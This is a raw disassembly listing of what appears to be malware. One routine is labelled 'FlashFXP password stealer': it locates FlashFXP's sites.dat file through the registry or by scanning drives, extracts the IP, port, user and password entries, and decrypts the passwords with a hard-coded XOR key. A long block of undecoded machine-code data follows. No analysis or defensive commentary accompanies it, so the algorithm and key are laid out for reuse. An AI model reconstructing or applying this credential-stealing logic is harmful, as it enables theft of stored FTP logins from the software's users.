mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
lea eax, [ebp+var_10]
push eax
push offset a02x ; "%02X"
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414816
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414816: ; CODE XREF: sub_4147E5+28�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
loc_41481E: ; CODE XREF: sub_4147E5:loc_4148BE�j
lea eax, [ebp+var_C]
push eax
push offset a02x ; "%02X"
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414842
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414842: ; CODE XREF: sub_4147E5+54�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_C]
xor ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
cmp eax, [ebp+var_C]
jl short loc_414866
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
loc_414866: ; CODE XREF: sub_4147E5+78�j
mov eax, [ebp+var_C]
sub eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
lea eax, [ebp+var_10]
push eax
push offset a02x ; "%02X"
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414899
xor eax, eax
jmp short locret_4148CC
; ---------------------------------------------------------------------------
loc_414899: ; CODE XREF: sub_4147E5+AE�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148B2
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
loc_4148B2: ; CODE XREF: sub_4147E5+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148BE
jmp short loc_4148C3
; ---------------------------------------------------------------------------
loc_4148BE: ; CODE XREF: sub_4147E5+D5�j
jmp loc_41481E
; ---------------------------------------------------------------------------
loc_4148C3: ; CODE XREF: sub_4147E5+D7�j
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
push 1
pop eax
locret_4148CC: ; CODE XREF: sub_4147E5+2C�j
; sub_4147E5+58�j ...
leave
retn
sub_4147E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148CE proc near ; CODE XREF: .text:00414A4E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push 20019h
push 0
push offset aSoftwareClasse ; "SOFTWARE\\Classes\\Applications\\FlashFXP."...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
mov [ebp+var_10], eax
mov [ebp+var_4], 104h
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
push 0
push 0
push 0
push [ebp+var_14]
call ds:dword_41700C ; RegQueryValueExA
mov [ebp+var_10], eax
push [ebp+var_14]
call ds:dword_417028 ; RegCloseKey
cmp [ebp+var_10], 0
jnz short loc_414971
push offset aFlashfxp_exe1 ; "FlashFXP.exe %1"
push 4
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_414945
jmp loc_414A17
; ---------------------------------------------------------------------------
loc_414945: ; CODE XREF: sub_4148CE+70�j
push offset aSites_dat ; "sites.dat"
push [ebp+var_18]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_18]
add eax, 0Fh
push eax
mov eax, [ebp+var_18]
add eax, 9
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 1
pop eax
jmp locret_414A1C
; ---------------------------------------------------------------------------
loc_414971: ; CODE XREF: sub_4148CE+55�j
; sub_4148CE:loc_414A17�j
push 104h
push [ebp+arg_0]
push offset aProgramfiles ; "ProgramFiles"
call ds:dword_417104 ; GetEnvironmentVariableA
push offset aFlashfxpSites_ ; "\\FlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4149B0
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_4149B0: ; CODE XREF: sub_4148CE+DB�j
mov eax, dword_419398
mov [ebp+var_C], eax
loc_4149B8: ; CODE XREF: sub_4148CE+143�j
lea eax, [ebp+var_C]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 5
jz short loc_414A02
cmp [ebp+var_1C], 2
jz short loc_414A02
lea eax, [ebp+var_C]
push eax
push offset aSflashfxpSites ; "%sFlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 0Ch
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_414A02
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A02: ; CODE XREF: sub_4148CE+FB�j
; sub_4148CE+101�j ...
mov al, byte ptr [ebp+var_C]
add al, 1
mov byte ptr [ebp+var_C], al
movsx eax, byte ptr [ebp+var_C]
cmp eax, 5Ah
jnz short loc_4149B8
xor eax, eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A17: ; CODE XREF: sub_4148CE+72�j
jmp loc_414971
; ---------------------------------------------------------------------------
locret_414A1C: ; CODE XREF: sub_4148CE+9E�j
; sub_4148CE+E0�j ...
leave
retn
sub_4148CE endp
; ---------------------------------------------------------------------------
loc_414A1E: ; DATA XREF: sub_414EB0+35�o
push ebp
mov ebp, esp
sub esp, 5E0h
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-32Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
lea eax, [ebp-180h]
push eax
call sub_4148CE
pop ecx
test eax, eax
jnz short loc_414A6B
push dword ptr [ebp-32Ch]
call sub_409763
pop ecx
xor eax, eax
jmp locret_414EAC
; ---------------------------------------------------------------------------
loc_414A6B: ; CODE XREF: .text:00414A56�j
mov eax, [ebp-32Ch]
push dword ptr [eax]
push offset unk_41D308
lea eax, [ebp-328h]
push eax
call sub_40D53F
add esp, 0Ch
and dword ptr [ebp-184h], 0
and dword ptr [ebp-334h], 0
mov al, [ebp-190h]
mov [ebp-330h], al
and byte ptr [ebp-190h], 0
push offset aRb ; "rb"
lea eax, [ebp-180h]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp-3C4h], eax
cmp dword ptr [ebp-3C4h], 0
jnz short loc_414ACF
jmp loc_414EAA
; ---------------------------------------------------------------------------
loc_414ACF: ; CODE XREF: .text:00414AC8�j
push 2
push 0
push dword ptr [ebp-3C4h]
call sub_416B96 ; fseek
add esp, 0Ch
push dword ptr [ebp-3C4h]
call sub_416B76 ; ftell
pop ecx
mov [ebp-3C0h], eax
cmp dword ptr [ebp-3C0h], 100000h
jnb short loc_414B0D
mov eax, [ebp-3C0h]
mov [ebp-5E0h], eax
jmp short loc_414B17
; ---------------------------------------------------------------------------
loc_414B0D: ; CODE XREF: .text:00414AFD�j
mov dword ptr [ebp-5E0h], 100000h
loc_414B17: ; CODE XREF: .text:00414B0B�j
mov eax, [ebp-5E0h]
mov [ebp-3C0h], eax
push 0
push 0
push dword ptr [ebp-3C4h]
call sub_416B96 ; fseek
add esp, 0Ch
mov eax, [ebp-3C0h]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp-3BCh], eax
cmp dword ptr [ebp-3BCh], 0
jnz short loc_414B63
push dword ptr [ebp-3C4h]
call sub_416B82 ; fclose
pop ecx
jmp loc_414EA8
; ---------------------------------------------------------------------------
loc_414B63: ; CODE XREF: .text:00414B50�j
push dword ptr [ebp-3C4h]
push dword ptr [ebp-3C0h]
push 1
push dword ptr [ebp-3BCh]
call sub_416B90 ; fread
add esp, 10h
push dword ptr [ebp-3C4h]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp-3BCh]
add eax, [ebp-3C0h]
and byte ptr [eax], 0
mov eax, [ebp-3BCh]
mov [ebp-3B8h], eax
loc_414BA6: ; CODE XREF: .text:00414E46�j
push offset asc_41D300 ; "\r\n\r\n["
push dword ptr [ebp-3B8h]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp-5DCh], eax
mov eax, [ebp-3B8h]
mov [ebp-5D0h], eax
push offset aIp ; "\r\nIP="
push dword ptr [ebp-3B8h]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp-5C8h], eax
push offset aPort ; "\r\nPort="
push dword ptr [ebp-3B8h]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp-5D8h], eax
push offset aUser ; "\r\nUser="
push dword ptr [ebp-3B8h]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp-5CCh], eax
push offset aPass ; "\r\nPass="
push dword ptr [ebp-3B8h]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp-5D4h], eax
cmp dword ptr [ebp-5C8h], 0
jz loc_414E13
cmp dword ptr [ebp-5DCh], 0
jz short loc_414C52
mov eax, [ebp-5C8h]
cmp eax, [ebp-5DCh]
jnb loc_414E13
loc_414C52: ; CODE XREF: .text:00414C3E�j
cmp dword ptr [ebp-5D8h], 0
jz loc_414E13
cmp dword ptr [ebp-5DCh], 0
jz short loc_414C7A
mov eax, [ebp-5D8h]
cmp eax, [ebp-5DCh]
jnb loc_414E13
loc_414C7A: ; CODE XREF: .text:00414C66�j
cmp dword ptr [ebp-5CCh], 0
jz loc_414E13
cmp dword ptr [ebp-5DCh], 0
jz short loc_414CA2
mov eax, [ebp-5CCh]
cmp eax, [ebp-5DCh]
jnb loc_414E13
loc_414CA2: ; CODE XREF: .text:00414C8E�j
cmp dword ptr [ebp-5D4h], 0
jz loc_414E13
cmp dword ptr [ebp-5DCh], 0
jz short loc_414CCA
mov eax, [ebp-5D4h]
cmp eax, [ebp-5DCh]
jnb loc_414E13
loc_414CCA: ; CODE XREF: .text:00414CB6�j
and byte ptr [ebp-4C4h], 0
mov al, [ebp-4C4h]
mov [ebp-3B4h], al
mov al, [ebp-3B4h]
mov [ebp-5C4h], al
mov al, [ebp-5C4h]
mov [ebp-444h], al
mov al, [ebp-444h]
mov [ebp-544h], al
lea eax, [ebp-544h]
push eax
push offset asc_41D2D4 ; "[%[^]]]\r\n"
push dword ptr [ebp-5D0h]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp-444h]
push eax
push offset aIp127s ; "\r\nIP=%127s\r\n"
push dword ptr [ebp-5C8h]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp-5C4h]
push eax
push offset aPort127s ; "\r\nPort=%127s\r\n"
push dword ptr [ebp-5D8h]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp-3B4h]
push eax
push offset aUser127s ; "\r\nUser=%127s\r\n"
push dword ptr [ebp-5CCh]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp-4C4h]
push eax
push offset aPass127s ; "\r\nPass=%127s\r\n"
push dword ptr [ebp-5D4h]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp-4C4h]
push eax
lea eax, [ebp-4C4h]
push eax
call sub_4147E5
pop ecx
pop ecx
test eax, eax
jnz short loc_414DA1
jmp loc_414E4B
; ---------------------------------------------------------------------------
loc_414DA1: ; CODE XREF: .text:00414D9A�j
mov eax, [ebp-334h]
inc eax
mov [ebp-334h], eax
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp-544h]
push eax
lea eax, [ebp-5C4h]
push eax
lea eax, [ebp-444h]
push eax
lea eax, [ebp-4C4h]
push eax
lea eax, [ebp-3B4h]
push eax
push dword ptr [ebp-334h]
push offset dword_41D268
lea eax, [ebp-328h]
push eax
call sub_40D53F
add esp, 20h
mov eax, [ebp-32Ch]
cmp dword ptr [eax+4], 0
jz short loc_414E13
push dword ptr [ebp-3BCh]
call sub_416B4C ; free
pop ecx
jmp loc_414EA6
; ---------------------------------------------------------------------------
loc_414E13: ; CODE XREF: .text:00414C31�j
; .text:00414C4C�j ...
mov eax, [ebp-184h]
inc eax
mov [ebp-184h], eax
mov eax, [ebp-5DCh]
mov [ebp-3B8h], eax
cmp dword ptr [ebp-3B8h], 0
jnz short loc_414E37
jmp short loc_414E4B
; ---------------------------------------------------------------------------
loc_414E37: ; CODE XREF: .text:00414E33�j
mov eax, [ebp-3B8h]
add eax, 4
mov [ebp-3B8h], eax
jmp loc_414BA6
; ---------------------------------------------------------------------------
loc_414E4B: ; CODE XREF: .text:00414D9C�j
; .text:00414E35�j
push dword ptr [ebp-3BCh]
call sub_416B4C ; free
pop ecx
loc_414E57: ; CODE XREF: .text:loc_414EA6�j
mov al, [ebp-330h]
mov [ebp-190h], al
push 3E8h
call ds:dword_41709C ; Sleep
push dword ptr [ebp-184h]
push dword ptr [ebp-334h]
mov eax, [ebp-32Ch]
push dword ptr [eax]
push offset unk_41D22C
lea eax, [ebp-328h]
push eax
call sub_40D53F
add esp, 14h
loc_414E96: ; CODE XREF: .text:loc_414EA8�j
; .text:loc_414EAA�j
push dword ptr [ebp-32Ch]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_414EAC
; ---------------------------------------------------------------------------
loc_414EA6: ; CODE XREF: .text:00414E0E�j
jmp short loc_414E57
; ---------------------------------------------------------------------------
loc_414EA8: ; CODE XREF: .text:00414B5E�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
loc_414EAA: ; CODE XREF: .text:00414ACA�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
locret_414EAC: ; CODE XREF: .text:00414A66�j
; .text:00414EA4�j
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414EB0 proc near ; CODE XREF: sub_40A9CF+769�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414ECA
jmp short locret_414EF2
; ---------------------------------------------------------------------------
loc_414ECA: ; CODE XREF: sub_414EB0+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFlashfxpPasswo ; "FlashFXP password stealer"
push 0
push [ebp+var_4]
push offset loc_414A1E
call sub_4095A4
add esp, 10h
locret_414EF2: ; CODE XREF: sub_414EB0+18�j
leave
retn
sub_414EB0 endp
; ---------------------------------------------------------------------------
aOa db '¸ÝoA',0 ; DATA XREF: sub_415AF0+40�o
db 0E8h, 12h, 1Fh
dd 0EC810000h, 0FFCh, 0A7685756h, 0FF000001h, 858D0875h
dd 0FFFFF410h, 1C38E850h, 0C4830000h, 875FF0Ch, 1C27E8h
dd 0A5835900h, 0FFFFF600h, 0FC658300h, 0BD8300h, 0FFFFF6h
dd 858B1274h, 0FFFFF600h, 0F6008D8Bh, 98BFFFFh, 851FF50h
dd 0F600A583h, 6A00FFFFh, 6A006A00h, 858D00h, 50FFFFF6h
dd 0DE8015FFh, 85890041h, 0FFFFF20Ch, 0F20CBD83h, 7D00FFFFh
dd 10B5FF3Dh, 0E8FFFFF4h, 0FFFF47E3h, 30A58359h, 0FFFFF0h
dd 0FFFC4D83h, 0F600BD83h, 7400FFFFh, 858B12h, 8BFFFFF6h
dd 0FFF6008Dh, 50098BFFh, 8B0851FFh, 0FFF03085h, 0B2EE9FFh
dd 65830000h, 45C600F0h, 7D8301FCh, 0C7400F0h, 8BF0458Bh
dd 98BF04Dh, 851FF50h, 0F06583h, 0F600BD83h, 7500FFFFh
dd 4003680Ah, 5DE88000h, 8B00001Eh, 0FFF60085h, 208589FFh
dd 8DFFFFF0h, 6A50F045h, 8B006A00h, 0FFF02085h, 0FF008BFFh
dd 0FFF020B5h, 3850FFFFh, 0F0248589h, 0BD83FFFFh, 0FFFFF024h
dd 68167D00h, 41D598h, 0F020B5FFh, 0B5FFFFFFh, 0FFFFF024h
dd 1E21E8h, 24858B00h, 89FFFFF0h, 0FFF20C85h, 0CBD83FFh
dd 0FFFFF2h, 0B5FF537Dh, 0FFFFF410h, 0FF4716E8h, 0A58359FFh
dd 0FFFFF02Ch, 0FC658000h, 0F07D8300h, 8B0C7400h, 4D8BF045h
dd 50098BF0h, 830851FFh, 83FFFC4Dh, 0FFF600BDh, 127400FFh
dd 0F600858Bh, 8D8BFFFFh, 0FFFFF600h, 0FF50098Bh, 858B0851h
dd 0FFFFF02Ch, 0A4BE9h, 10858B00h, 0FFFFFFF4h, 0D5646830h
dd 858D0041h, 0FFFFF414h, 8491E850h, 0C483FFFFh, 0ECA5830Ch
dd 0FFFFFDh, 0F5AC858Ah, 8588FFFFh, 0FFFFF5ECh, 0F5ACA580h
dd 8300FFFFh, 7500F07Dh, 4003680Ah, 65E88000h, 6A00001Dh
dd 0F0858D00h, 50FFFFF5h, 458B016Ah, 8589F0h, 8BFFFFF0h
dd 0FFF00085h, 0FF008BFFh, 0FFF000B5h, 0C50FFFFh, 850FC085h
dd 951h, 0F410858Bh, 7883FFFFh, 5740004h, 940E9h, 10EC8300h
dd 0F5F0B58Dh, 0FC8BFFFFh, 0A5A5A5A5h, 41D56068h, 0B8858D00h
dd 50FFFFF5h, 71E015FFh, 0C4830041h, 8A58318h, 0FFFFF2h
dd 2FC45C6h, 0F208BD83h, 7400FFFFh, 8858B12h, 8BFFFFF2h
dd 0FFF2088Dh, 50098BFFh, 830851FFh, 0FFF208A5h, 0BD8300FFh
dd 0FFFFF600h, 680A7500h, 80004003h, 1CC3E8h, 858B00h
dd 89FFFFF6h, 0FFF01885h, 8858DFFh, 50FFFFF2h, 858D006Ah
dd 0FFFFF5F0h, 8B006A50h, 0FFF01885h, 0FF008BFFh, 0FFF018B5h
dd 3C50FFFFh, 0F01C8589h, 0BD83FFFFh, 0FFFFF01Ch, 68167D00h
dd 41D598h, 0F018B5FFh, 0B5FFFFFFh, 0FFFFF01Ch, 1C7DE8h
dd 1C858B00h, 89FFFFF0h, 0FFF20C85h, 8BD83FFh, 0FFFFF2h
dd 3680A75h, 0E8800040h, 1C50h, 858D006Ah, 0FFFFF1F8h
dd 8B016A50h, 0FFF20885h, 0FC8589FFh, 8BFFFFEFh, 0FFEFFC85h
dd 0FF008BFFh, 0FFEFFCB5h, 0C50FFFFh, 850FC085h, 815h
dd 0F1ECA583h, 0C600FFFFh, 8303FC45h, 0FFF1ECBDh, 127400FFh
dd 0F1EC858Bh, 8D8BFFFFh, 0FFFFF1ECh, 0FF50098Bh, 0A5830851h
dd 0FFFFF1ECh, 0BD8300h, 0FFFFF6h, 3680A75h, 0E8800040h
dd 1BE0h, 0F600858Bh, 8589FFFFh, 0FFFFF010h, 0F1EC858Dh
dd 6A50FFFFh, 0F8858D00h, 50FFFFF1h, 0F5F0858Dh, 6A50FFFFh
dd 10858B00h, 8BFFFFF0h, 10B5FF00h, 0FFFFFFF0h, 85895450h
dd 0FFFFF014h, 0F014BD83h, 7D00FFFFh, 0D5986816h, 0B5FF0041h
dd 0FFFFF010h, 0F014B5FFh, 93E8FFFFh, 8B00001Bh, 0FFF01485h
dd 0F08589FFh, 83FFFFF1h, 0FFF1ECBDh, 0A7500FFh, 400368h
dd 1B66E880h, 6A0000h, 0F1F4858Dh, 6A50FFFFh, 0EC858B01h
dd 89FFFFF1h, 0FFEFF885h, 0F8858BFFh, 8BFFFFEFh, 0F8B5FF00h
dd 0FFFFFFEFh, 0C0850C50h, 707850Fh, 0B5FF0000h, 0FFFFF1F4h
dd 41D55C68h, 0F0858D00h, 50FFFFFDh, 71E015FFh, 0C4830041h
dd 0E8A5830Ch, 0FFFFF1h, 0F118A583h, 8300FFFFh, 0FFF11CA5h
dd 0BD8300FFh, 0FFFFF600h, 680A7500h, 80004003h, 1AF3E8h
dd 0F4858B00h, 89FFFFF1h, 0FFF00485h, 858BFFh, 89FFFFF6h
dd 0FFF00885h, 0FF006AFFh, 0FFF11CB5h, 18858DFFh, 50FFFFF1h
dd 0F1E8858Dh, 0FF50FFFFh, 0FFF004B5h, 0F8858DFFh, 50FFFFF1h
dd 0F5F0858Dh, 6A50FFFFh, 8858B00h, 8BFFFFF0h, 8B5FF00h
dd 0FFFFFFF0h, 85894450h, 0FFFFF00Ch, 0F00CBD83h, 7D00FFFFh
dd 0D5986816h, 0B5FF0041h, 0FFFFF008h, 0F00CB5FFh, 87E8FFFFh
dd 8B00001Ah, 0FFF00C85h, 0F08589FFh, 0FFFFFFF1h, 0FFF118B5h
dd 1762E8FFh, 8B590000h, 0FFF1E88Dh, 0C13B49FFh, 89830Fh
dd 0A5830000h, 0FFFFF114h, 10A58300h, 0FFFFF1h, 858B0EEBh
dd 0FFFFF110h, 85894040h, 0FFFFF110h, 0F110858Bh, 853BFFFFh
dd 0FFFFF1E8h, 858B4D73h, 0FFFFF118h, 0F1108503h, 0B60FFFFFh
dd 75C08500h, 14858B10h, 0C6FFFFF1h, 0F6040584h, 0EB2CFFFFh
dd 18858B1Bh, 3FFFFF1h, 0FFF11085h, 148D8BFFh, 8AFFFFF1h
dd 0D848800h, 0FFFFF604h, 0F114858Bh, 8940FFFFh, 0FFF11485h
dd 8B97EBFFh, 0FFF11485h, 5A480FFh, 0FFFFF603h, 0FF1BEB00h
dd 0FFF118B5h, 8B6468FFh, 858D0041h, 0FFFFF604h, 0E015FF50h
dd 83004171h, 30680CC4h, 8D0041DEh, 0FFF80485h, 15FF50FFh
dd 4170FCh, 41DE3068h, 10858D00h, 50FFFFF2h, 70FC15FFh
dd 50680041h, 8D0041D5h, 0FFF5B885h, 15FF50FFh, 417108h
dd 4075C085h, 0FDEC858Bh, 8940FFFFh, 0FFFDEC85h, 85BE0FFFh
dd 0FFFFF5A9h, 2875C085h, 0F604858Dh, 8D50FFFFh, 0FFFDF085h
dd 0B5FF50FFh, 0FFFFFDECh, 41D51068h, 14858D00h, 50FFFFF4h
dd 0FF8036E8h, 14C483FFh, 41D50468h, 0B8858D00h, 50FFFFF5h
dd 710815FFh, 0C0850041h, 0A8850Fh, 30680000h, 8D0041DEh
dd 0FFF12085h, 15FF50FFh, 4170FCh, 4184FC68h, 4858D00h
dd 50FFFFF6h, 165FE8h, 85595900h, 683874C0h, 4184FCh, 0F604858Dh
dd 0E850FFFFh, 1648h, 50405959h, 0F120858Dh, 0FF50FFFFh
dd 4170FC15h, 84FC6800h, 858D0041h, 0FFFFF604h, 1626E850h
dd 59590000h, 8B002080h, 0FFFDEC85h, 858940FFh, 0FFFFFDECh
dd 3E868h, 9C15FF00h, 8D004170h, 0FFF12085h, 858D50FFh
dd 0FFFFF604h, 0F0858D50h, 50FFFFFDh, 0FDECB5FFh, 0AC68FFFFh
dd 8D0041D4h, 0FFF41485h, 74E850FFh, 83FFFF7Fh, 0A06818C4h
dd 8D0041D4h, 0FFF5B885h, 15FF50FFh, 417108h, 850FC085h
dd 25Ah, 0F038A583h, 0C700FFFFh, 0FFF10485h, 1FFh, 34A58300h
dd 0FFFFF0h, 858B0EEBh, 0FFFFF034h, 85894040h, 0FFFFF034h
dd 0F034858Bh, 853BFFFFh, 0FFFFF1E8h, 0B2830Fh, 858B0000h
dd 0FFFFF118h, 0F0348503h, 0B60FFFFFh, 75C08500h, 38858B1Dh
dd 0C6FFFFF0h, 0F6040584h, 8B2CFFFFh, 0FFF03885h, 858940FFh
dd 0FFFFF038h, 858B7DEBh, 0FFFFF118h, 0F0348503h, 8AFFFFh
dd 0DC15FF50h, 85004171h, 8B3C75C0h, 0FFF11885h, 348503FFh
dd 0FFFFFF0h, 0F88300B6h, 8B287440h, 0FFF11885h, 348503FFh
dd 0FFFFFF0h, 0F88300B6h, 8B14742Eh, 0FFF11885h, 348503FFh
dd 0FFFFFF0h, 0F88300B6h, 8B28755Fh, 0FFF11885h, 348503FFh
dd 8BFFFFF0h, 0FFF0388Dh, 88008AFFh, 0F6040D84h, 858BFFFFh
dd 0FFFFF038h, 38858940h, 0E9FFFFF0h, 0FFFFFF2Eh, 0F038858Bh
dd 0A480FFFFh, 0FFF60305h, 858D00FFh, 0FFFFF606h, 0F10C8589h
dd 0A583FFFFh, 0FFFFF108h, 8B0DEB00h, 0FFF10885h
dd 858940FFh, 0FFFFF108h, 0F118858Bh, 0B60FFFFFh, 85390440h
dd 0FFFFF108h, 1288D0Fh, 858B0000h, 0FFFFF10Ch, 858D5040h
dd 0FFFFF03Ch, 0FC15FF50h, 68004170h, 41D49Ch, 0F03C858Dh
dd 0E850FFFFh, 1468h, 0C0855959h, 9C681674h, 8D0041D4h
dd 0FFF03C85h, 51E850FFh, 59000014h, 208059h, 41D49C68h
dd 0C858B00h, 40FFFFF1h, 143AE850h, 59590000h, 2474C085h
dd 41D49C68h, 0C858B00h, 40FFFFF1h, 1422E850h, 59590000h
dd 8D504040h, 0FFF0A085h, 15FF50FFh, 4170FCh, 41D49C68h
dd 0A0858D00h, 50FFFFF0h, 13FFE8h, 85595900h, 681674C0h
dd 41D49Ch, 0F0A0858Dh, 0E850FFFFh, 13E8h, 20805959h, 0D49C6800h
dd 858B0041h, 0FFFFF10Ch, 0D1E85040h, 59000013h, 8DF08B59h
dd 0FFF0A085h, 15FF50FFh, 41703Ch, 906448Dh, 0F10C8589h
dd 858BFFFFh, 0FFFFFDECh, 0EC858940h, 68FFFFFDh, 3E8h
dd 709C15FFh, 0BE0F0041h, 0FFF5A985h, 75C085FFh, 0A0858D28h
dd 50FFFFF0h, 0F03C858Dh, 0FF50FFFFh, 0FFFDECB5h, 0D45C68FFh
dd 858D0041h, 0FFFFF414h, 7D05E850h, 0C483FFFFh, 0FEB5E914h
dd 5068FFFFh, 8D0041D4h, 0FFF5B885h, 15FF50FFh, 417108h
dd 850FC085h, 184h, 41D44468h, 0F0858D00h, 50FFFFFDh, 133BE8h
dd 85595900h, 69850FC0h, 68000001h, 41D43Ch, 0FDF0858Dh
dd 0E850FFFFh, 1320h, 0C0855959h, 3C681674h, 8D0041D4h
dd 0FFFDF085h, 9E850FFh, 59000013h, 208059h, 858D086Ah
dd 0FFFFFDF0h, 20858D50h, 50FFFFF1h, 710015FFh, 34680041h
dd 8D0041D4h, 0FFF12085h, 0DDE850FFh, 59000012h, 75C08559h
dd 0D42C6867h, 858D0041h, 0FFFFF120h, 12C6E850h, 59590000h
dd 5075C085h, 0FDEC858Bh, 8940FFFFh, 0FFFDEC85h, 3E868FFh
dd 15FF0000h, 41709Ch, 0A985BE0Fh, 85FFFFF5h, 8D2875C0h
dd 0FFF60485h, 858D50FFh, 0FFFFFDF0h, 0ECB5FF50h, 68FFFFFDh
dd 41D3E4h, 0F414858Dh, 0E850FFFFh, 0FFFF7C0Fh, 0E914C483h
dd 0A8h, 41DE3068h, 20858D00h, 50FFFFF1h, 70FC15FFh, 9C680041h
dd 8D0041D4h, 0FFF60485h, 4DE850FFh, 59000012h, 74C08559h
dd 0D49C6838h, 858D0041h, 0FFFFF604h, 1236E850h, 59590000h
dd 858D5040h, 0FFFFF120h, 0FC15FF50h, 68004170h, 41D49Ch
dd 0F604858Dh, 0E850FFFFh, 1214h, 20805959h, 0EC858B00h
dd 40FFFFFDh, 0FDEC8589h, 0E868FFFFh, 0FF000003h, 41709C15h
dd 20858D00h, 50FFFFF1h, 0F604858Dh, 8D50FFFFh, 0FFFDF085h
dd 0B5FF50FFh, 0FFFFFDECh, 41D38868h, 14858D00h, 50FFFFF4h
dd 0FF7B62E8h, 18C483FFh, 20068h, 8D006A00h, 0FFFDF085h
dd 77E850FFh, 83000011h, 680CC4h, 6A000002h, 4858D00h
dd 50FFFFF6h, 1161E8h, 0CC48300h, 0FFF8B6E9h, 0FC45C6FFh
dd 0ECBD8302h, 0FFFFF1h, 858B1274h, 0FFFFF1ECh, 0F1EC8D8Bh
dd 98BFFFFh, 851FF50h, 0FFF7A8E9h, 0FC45C6FFh, 8BD8301h
dd 0FFFFF2h, 858B1274h, 0FFFFF208h, 0F2088D8Bh, 98BFFFFh
dd 851FF50h, 0FFF672E9h, 0EC858AFFh, 88FFFFF5h, 0FFF5AC85h
dd 3E868FFh, 15FF0000h, 41709Ch, 0FDECB5FFh, 858BFFFFh
dd 0FFFFF410h, 4C6830FFh, 8D0041D3h, 0FFF41485h, 0B0E850FFh
dd 83FFFF7Ah, 0B5FF10C4h, 0FFFFF410h, 0FF3CC6E8h, 0A58359FFh
dd 0FFFFF028h, 0FC658000h, 0F07D8300h, 8B0C7400h, 4D8BF045h
dd 50098BF0h, 830851FFh, 83FFFC4Dh, 0FFF600BDh, 127400FFh
dd 0F600858Bh, 8D8BFFFFh, 0FFFFF600h, 0FF50098Bh, 858B0851h
